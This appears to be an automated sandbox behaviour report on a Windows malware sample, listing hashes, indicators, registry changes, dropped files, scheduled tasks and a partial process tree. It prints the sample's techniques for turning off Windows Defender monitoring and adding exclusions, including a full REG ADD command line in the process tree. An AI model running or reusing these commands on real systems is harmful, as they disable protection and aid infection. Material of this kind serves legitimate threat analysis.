Analysis
-
max time kernel
132s -
max time network
135s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
28-12-2022 14:18
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
2432a7f215e6638bf6a22ee6aa0cbb9d
-
SHA1
fd80a9a38c55c232dde6c542516727dc057060f3
-
SHA256
d80f194876cb94d195e4f49454b69e94cbedd923b6d878433146fa0cd80fe555
-
SHA512
5f6ad51a71b994963978b6aafef10c09063c125e73c8b5b210c667ebb564533fde336f89ef8baa44251ae6603ad24e6bc09e8444380e9150b6f025d184804a48
-
SSDEEP
196608:91OTmZ6GBdXoHdw17Pa5CiCG8q9A4U0tPPYxa:3OSwGBdXoHk7YO4PPY8
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\fhBFpVnggPzMPeStb = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\DqDcXDIcivQcLfhF = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\DqDcXDIcivQcLfhF = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xdyFYuQYPTUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zEEsyDgAqHSfC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xdyFYuQYPTUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\DqDcXDIcivQcLfhF = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\DqDcXDIcivQcLfhF = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lGfNIDOyAPeU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gHzIMIkcU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\LPkuZQFwFEsJqCVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lGfNIDOyAPeU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\LPkuZQFwFEsJqCVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dQuCWKvYVGrEzExAWxR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\fhBFpVnggPzMPeStb = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dQuCWKvYVGrEzExAWxR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zEEsyDgAqHSfC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gHzIMIkcU = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 1956 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1404 Install.exe 972 Install.exe 1736 iOiQwnd.exe 1496 wnwOpin.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Control Panel\International\Geo\Nation wnwOpin.exe -
Loads dropped DLL 12 IoCs
pid Process 1292 file.exe 1404 Install.exe 1404 Install.exe 1404 Install.exe 1404 Install.exe 972 Install.exe 972 Install.exe 972 Install.exe 1956 rundll32.exe 1956 rundll32.exe 1956 rundll32.exe 1956 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json wnwOpin.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 wnwOpin.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 wnwOpin.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol iOiQwnd.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA wnwOpin.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D wnwOpin.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D wnwOpin.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol iOiQwnd.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini iOiQwnd.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA wnwOpin.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol wnwOpin.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA wnwOpin.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA wnwOpin.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat wnwOpin.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi wnwOpin.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak wnwOpin.exe File created C:\Program Files (x86)\gHzIMIkcU\MrkFykk.xml wnwOpin.exe File created C:\Program Files (x86)\dQuCWKvYVGrEzExAWxR\jqjWhPO.dll wnwOpin.exe File created C:\Program Files (x86)\dQuCWKvYVGrEzExAWxR\pWeFFbl.xml wnwOpin.exe File created C:\Program Files (x86)\xdyFYuQYPTUn\PHjREJz.dll wnwOpin.exe File created C:\Program Files (x86)\zEEsyDgAqHSfC\qXJWkJt.xml wnwOpin.exe File created C:\Program Files (x86)\gHzIMIkcU\LDSkXR.dll wnwOpin.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi wnwOpin.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja wnwOpin.exe File created C:\Program Files (x86)\lGfNIDOyAPeU2\DLxDZSLkWXjRi.dll wnwOpin.exe File created C:\Program Files (x86)\lGfNIDOyAPeU2\dVLQtDP.xml wnwOpin.exe File created C:\Program Files (x86)\zEEsyDgAqHSfC\ftaRCYE.dll wnwOpin.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bphDoRVzdNCiekKFew.job schtasks.exe File created C:\Windows\Tasks\akiZFTTexhjRSqPeU.job schtasks.exe File created C:\Windows\Tasks\faLKMYTVtmmDTPg.job schtasks.exe File created C:\Windows\Tasks\QdMLWSarZZCSOkoUG.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1492 schtasks.exe 1976 schtasks.exe 1056 schtasks.exe 1484 schtasks.exe 1588 schtasks.exe 1860 schtasks.exe 1552 schtasks.exe 1452 schtasks.exe 2028 schtasks.exe 296 schtasks.exe 536 schtasks.exe 1852 schtasks.exe 1968 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ae-b0-ae-a9-cb-d4\WpadDecision = "0" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{296AE674-129F-49C2-ABA9-B4DF2F53302C}\WpadDecisionTime = b06d2ce1cf1ad901 wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ae-b0-ae-a9-cb-d4\WpadDecisionTime = b06d2ce1cf1ad901 wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs wnwOpin.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{296AE674-129F-49C2-ABA9-B4DF2F53302C} wnwOpin.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ae-b0-ae-a9-cb-d4\WpadDecisionReason = "1" wnwOpin.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs wnwOpin.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0050000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ae-b0-ae-a9-cb-d4\WpadDetectedUrl rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{296AE674-129F-49C2-ABA9-B4DF2F53302C}\ae-b0-ae-a9-cb-d4 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ae-b0-ae-a9-cb-d4\WpadDecisionTime = b06d2ce1cf1ad901 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad wnwOpin.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{296AE674-129F-49C2-ABA9-B4DF2F53302C}\WpadDecisionReason = "1" wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs wnwOpin.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections wnwOpin.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0050000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs wnwOpin.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings wnwOpin.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{296AE674-129F-49C2-ABA9-B4DF2F53302C}\WpadDecision = "0" wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 wnwOpin.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs wnwOpin.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 1676 powershell.EXE 1676 powershell.EXE 1676 powershell.EXE 1720 powershell.EXE 1720 powershell.EXE 1720 powershell.EXE 852 powershell.EXE 852 powershell.EXE 852 powershell.EXE 1052 powershell.EXE 1052 powershell.EXE 1052 powershell.EXE 1496 wnwOpin.exe 1496 wnwOpin.exe 1496 wnwOpin.exe 1496 wnwOpin.exe 1496 wnwOpin.exe 1496 wnwOpin.exe 1496 wnwOpin.exe 1496 wnwOpin.exe 1496 wnwOpin.exe 1496 wnwOpin.exe 1496 wnwOpin.exe 1496 wnwOpin.exe 1496 wnwOpin.exe 1496 wnwOpin.exe 1496 wnwOpin.exe 1496 wnwOpin.exe 1496 wnwOpin.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1676 powershell.EXE Token: SeDebugPrivilege 1720 powershell.EXE Token: SeDebugPrivilege 852 powershell.EXE Token: SeDebugPrivilege 1052 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1292 wrote to memory of 1404 1292 file.exe 28 PID 1292 wrote to memory of 1404 1292 file.exe 28 PID 1292 wrote to memory of 1404 1292 file.exe 28 PID 1292 wrote to memory of 1404 1292 file.exe 28 PID 1292 wrote to memory of 1404 1292 file.exe 28 PID 1292 wrote to memory of 1404 1292 file.exe 28 PID 1292 wrote to memory of 1404 1292 file.exe 28 PID 1404 wrote to memory of 972 1404 Install.exe 29 PID 1404 wrote to memory of 972 1404 Install.exe 29 PID 1404 wrote to memory of 972 1404 Install.exe 29 PID 1404 wrote to memory of 972 1404 Install.exe 29 PID 1404 wrote to memory of 972 1404 Install.exe 29 PID 1404 wrote to memory of 972 1404 Install.exe 29 PID 1404 wrote to memory of 972 1404 Install.exe 29 PID 972 wrote to memory of 1484 972 Install.exe 31 PID 972 wrote to memory of 1484 972 Install.exe 31 PID 972 wrote to memory of 1484 972 Install.exe 31 PID 972 wrote to memory of 1484 972 Install.exe 31 PID 972 wrote to memory of 1484 972 Install.exe 31 PID 972 wrote to memory of 1484 972 Install.exe 31 PID 972 wrote to memory of 1484 972 Install.exe 31 PID 972 wrote to memory of 1860 972 Install.exe 33 PID 972 wrote to memory of 1860 972 Install.exe 33 PID 972 wrote to memory of 1860 972 Install.exe 33 PID 972 wrote to memory of 1860 972 Install.exe 33 PID 972 wrote to memory of 1860 972 Install.exe 33 PID 972 wrote to memory of 1860 972 Install.exe 33 PID 972 wrote to memory of 1860 972 Install.exe 33 PID 1860 wrote to memory of 924 1860 forfiles.exe 36 PID 1860 wrote to memory of 924 1860 forfiles.exe 36 PID 1860 wrote to memory of 924 1860 forfiles.exe 36 PID 1860 wrote to memory of 924 1860 forfiles.exe 36 PID 1860 wrote to memory of 924 1860 forfiles.exe 36 PID 1860 wrote to memory of 924 1860 forfiles.exe 36 PID 1860 wrote to memory of 924 1860 forfiles.exe 36 PID 1484 wrote to memory of 1752 1484 forfiles.exe 35 PID 1484 wrote to memory of 1752 1484 forfiles.exe 35 PID 1484 wrote to memory of 1752 1484 forfiles.exe 35 PID 1484 wrote to memory of 1752 1484 forfiles.exe 35 PID 1484 wrote to memory of 1752 1484 forfiles.exe 35 PID 1484 wrote to memory of 1752 1484 forfiles.exe 35 PID 1484 wrote to memory of 1752 1484 forfiles.exe 35 PID 924 wrote to memory of 1596 924 cmd.exe 38 PID 924 wrote to memory of 1596 924 cmd.exe 38 PID 924 wrote to memory of 1596 924 cmd.exe 38 PID 924 wrote to memory of 1596 924 cmd.exe 38 PID 924 wrote to memory of 1596 924 cmd.exe 38 PID 924 wrote to memory of 1596 924 cmd.exe 38 PID 924 wrote to memory of 1596 924 cmd.exe 38 PID 1752 wrote to memory of 1856 1752 cmd.exe 37 PID 1752 wrote to memory of 1856 1752 cmd.exe 37 PID 1752 wrote to memory of 1856 1752 cmd.exe 37 PID 1752 wrote to memory of 1856 1752 cmd.exe 37 PID 1752 wrote to memory of 1856 1752 cmd.exe 37 PID 1752 wrote to memory of 1856 1752 cmd.exe 37 PID 1752 wrote to memory of 1856 1752 cmd.exe 37 PID 924 wrote to memory of 836 924 cmd.exe 39 PID 924 wrote to memory of 836 924 cmd.exe 39 PID 924 wrote to memory of 836 924 cmd.exe 39 PID 924 wrote to memory of 836 924 cmd.exe 39 PID 924 wrote to memory of 836 924 cmd.exe 39 PID 924 wrote to memory of 836 924 cmd.exe 39 PID 924 wrote to memory of 836 924 cmd.exe 39 PID 1752 wrote to memory of 1108 1752 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Users\Admin\AppData\Local\Temp\7zS14E8.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Users\Admin\AppData\Local\Temp\7zS194C.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:972 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1484 -
